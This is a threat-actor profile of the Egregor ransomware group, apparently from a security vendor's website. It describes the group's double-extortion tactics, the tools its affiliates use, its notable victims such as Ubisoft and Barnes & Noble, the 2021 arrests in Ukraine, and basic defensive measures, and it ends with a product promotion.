Threat Actor Profile
Egregor
Egregor is a sophisticated ransomware-as-a-service (RaaS) operation that burst onto the scene in September 2020, quickly gaining notoriety as the heir apparent to the infamous Maze ransomware group. Known for its double-extortion tactics, Egregor not only encrypts victim data but also exfiltrates it, threatening public release to pressure companies into paying up.
Threat Actor Profile
Egregor
Country of Origin
The exact country of origin for Egregor's operators is unknown. However, some members of an affiliated group were arrested in Ukraine, suggesting a connection to Eastern Europe.
Members
As a RaaS operation, Egregor's "members" are a distributed network of affiliates who carry out the attacks. In early 2021, Ukrainian and French authorities arrested several individuals believed to be affiliates who provided logistical and financial support to the group.
Leadership
The leadership structure and specific aliases of Egregor's core team remain unknown.
Egregor TTPs
Tactics
Egregor's primary goal is financial extortion. Their tactics are centered around maximizing pressure on victims to force a ransom payment. This is achieved through a double-extortion model where they first steal sensitive corporate data and then encrypt the network. If the victim hesitates to pay, the group publishes the stolen data on a public leak site, adding a layer of public humiliation and regulatory risk to the incident.
Techniques
These actors are jacks-of-all-trades when it comes to getting inside a network. They often gain initial access through compromised credentials for Remote Desktop Protocol (RDP) or VPNs. Phishing emails with malicious attachments are another common entry point. Once inside, they use popular penetration testing tools like Cobalt Strike and network scanners to map the environment, escalate privileges, and move laterally to compromise as much of the network as possible.
Procedures
Egregor's procedures show a clear, methodical approach. After initial access, they deploy malware like QakBot or IcedID to establish a foothold. They then use tools like Rclone (often disguised as svchost) and 7zip to exfiltrate large volumes of data. Once the data is secured, they execute the ransomware payload, which encrypts files and even uses the victim's own printers to print out copies of the ransom note, titled "RECOVER-FILES.txt," ensuring the message is received loud and clear.
Want to Shut Down Threats Before They Start?
Notable Cyberattacks
Egregor made headlines throughout late 2020 with a string of aggressive, high-profile attacks. In October 2020, they hit both video game company Ubisoft and book retailer Barnes & Noble, leaking data from both to their public shame site. In December 2020, they targeted Randstad, a global HR and recruitment firm, claiming to have stolen a significant amount of data. These attacks demonstrated the group's ability to successfully infiltrate large, multinational corporations and follow through on their threats of public data leaks.
Law Enforcement & Arrests
In February 2021, a joint operation by French and Ukrainian authorities resulted in the arrest of several individuals in Ukraine linked to the Egregor operation. The suspects were described as affiliates who provided hacking and logistical support, rather than the core developers. This law enforcement action significantly disrupted the group's activities, and Egregor's public leak site went offline shortly after. While some key members likely remain at large, the arrests marked a major blow to the RaaS network.
How to Defend Against Egregor
Secure Remote Access: Lock down RDP and VPNs. Use multi-factor authentication (MFA) everywhere you can, restrict access to only those who need it, and use strong, unique passwords.
Patch, Patch, Patch: Keep your systems and software updated. Egregor and its affiliates are always looking for unpatched vulnerabilities to exploit.
Train Your Team: Since phishing is a common entry vector, educate your employees to spot and report suspicious emails. A well-trained team is your first line of defense.
Back It Up: Maintain offline, isolated backups of your critical data. If the worst happens, you can restore your systems without paying a dime.
The Huntress Managed Security Platform is built to stop attackers in their tracks. Our 24/7 ThreatOps team actively hunts for the very TTPs used by groups like Egregor—from malicious scripts and suspicious processes to lateral movement with tools like Cobalt Strike. We don't just send alerts; we provide actionable remediation guidance to kick hackers out and keep them out.
References
Detect, Respond, Protect
See how the global Huntress SOC can augment your team
with 24/7 coverage and unmatched human expertise.
Start your free trial today.
